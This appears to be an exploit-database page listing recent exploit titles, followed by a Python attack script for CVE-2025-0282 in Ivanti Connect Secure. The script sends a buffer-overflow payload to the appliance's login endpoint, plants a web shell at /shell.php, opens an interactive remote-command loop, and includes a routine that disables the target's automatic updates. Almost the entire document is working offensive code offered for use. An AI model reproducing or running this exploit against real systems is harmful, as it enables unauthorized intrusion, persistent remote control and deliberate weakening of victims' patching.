b905517ca9
22 changes to exploits/shellcodes/ghdb Spring Boot common-user-management 0.1 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE) ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS ABB Cylon Aspect 3.08.03 - Hard-coded Secrets Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE) IBMi Navigator 7.5 - HTTP Security Token Bypass IBMi Navigator 7.5 - Server Side Request Forgery (SSRF) Plane 0.23.1 - Server side request forgery (SSRF) ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS) ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated) OpenCMS 17.0 - Stored Cross Site Scripting (XSS) Really Simple Security 9.1.1.1 - Authentication Bypass Pymatgen 2024.1 - Remote Code Execution (RCE)
138 lines
No EOL
4.3 KiB
Python
Executable file
138 lines
No EOL
4.3 KiB
Python
Executable file
# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
|
|
# Date: 2025-01-11
|
|
# Exploit Author: @absholi7ly
|
|
# CVE: CVE-2025-0282
|
|
|
|
import requests
|
|
import sys
|
|
import struct
|
|
import socket
|
|
import ssl
|
|
import urllib3
|
|
import time
|
|
|
|
# Disable SSL warnings
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
|
|
|
|
payload = b"A" * offset # Fill the buffer
|
|
payload += struct.pack("<I", system_address) # Overwrite return address with system()
|
|
payload += b"BBBB" # Fake return address
|
|
payload += struct.pack("<I", command_address) # Address of the command
|
|
payload += command.encode() # Command to execute
|
|
return payload
|
|
|
|
def send_payload(target_ip, payload):
|
|
|
|
try:
|
|
context = ssl.create_default_context()
|
|
context.check_hostname = False
|
|
context.verify_mode = ssl.CERT_NONE
|
|
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.settimeout(5)
|
|
ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
|
|
|
|
ssl_sock.connect((target_ip, 443))
|
|
print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
|
|
|
|
exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
|
|
http_request = (
|
|
f"POST {exploit_endpoint} HTTP/1.1\r\n"
|
|
f"Host: {target_ip}\r\n"
|
|
f"Content-Length: {len(payload)}\r\n"
|
|
f"Content-Type: application/x-www-form-urlencoded\r\n"
|
|
f"\r\n"
|
|
).encode() + payload
|
|
|
|
ssl_sock.send(http_request)
|
|
response = ssl_sock.recv(4096)
|
|
ssl_sock.close()
|
|
return response.decode(errors="replace")
|
|
|
|
except Exception as e:
|
|
print(f"[-] Error sending payload: {e}")
|
|
return None
|
|
|
|
def exploit_vulnerability(target_ip, command):
|
|
|
|
payload = create_exploit_payload(command)
|
|
response = send_payload(target_ip, payload)
|
|
if response:
|
|
print("[+] Payload sent successfully.")
|
|
else:
|
|
print("[-] No response received.")
|
|
|
|
def upload_web_shell(target_ip, local_shell_path):
|
|
|
|
try:
|
|
with open(local_shell_path, "r") as f:
|
|
web_shell_content = f.read()
|
|
|
|
command = f"echo '{web_shell_content}' > /shell.php"
|
|
exploit_vulnerability(target_ip, command)
|
|
print("[+] Web shell uploaded successfully at /shell.php.")
|
|
verify_shell(target_ip)
|
|
|
|
except Exception as e:
|
|
print(f"[-] Error uploading web shell: {e}")
|
|
|
|
def verify_shell(target_ip):
|
|
|
|
shell_url = f"http://{target_ip}/shell.php"
|
|
try:
|
|
response = requests.get(shell_url, verify=False, timeout=10)
|
|
if response.status_code == 200:
|
|
print("[+] Web shell is accessible.")
|
|
else:
|
|
print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
|
|
except Exception as e:
|
|
print(f"[-] Error verifying web shell: {e}")
|
|
|
|
def execute_shell_command(target_ip, command):
|
|
|
|
shell_url = f"http://{target_ip}/shell.php"
|
|
try:
|
|
# Sending the command via POST
|
|
response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
|
|
if response.status_code == 200:
|
|
print(f"[+] Command output:\n{response.text.strip()}")
|
|
else:
|
|
print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
|
|
except Exception as e:
|
|
print(f"[-] Error executing command via web shell: {e}")
|
|
|
|
def disable_updates(target_ip):
|
|
|
|
commands = [
|
|
"systemctl stop apt-daily.service",
|
|
"systemctl disable apt-daily.service"
|
|
]
|
|
for command in commands:
|
|
execute_shell_command(target_ip, command)
|
|
print("[+] System updates disabled successfully.")
|
|
|
|
|
|
def main():
|
|
|
|
if len(sys.argv) != 3:
|
|
print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
|
|
sys.exit(1)
|
|
|
|
target_ip = sys.argv[1]
|
|
local_shell_path = sys.argv[2]
|
|
|
|
# Upload the web shell
|
|
upload_web_shell(target_ip, local_shell_path)
|
|
|
|
while True:
|
|
command = input("Enter command to execute on the target (or 'exit' to quit): ")
|
|
if command.lower() == "exit":
|
|
print("Exiting...")
|
|
break
|
|
|
|
execute_shell_command(target_ip, command)
|
|
|
|
if __name__ == "__main__":
|
|
main() |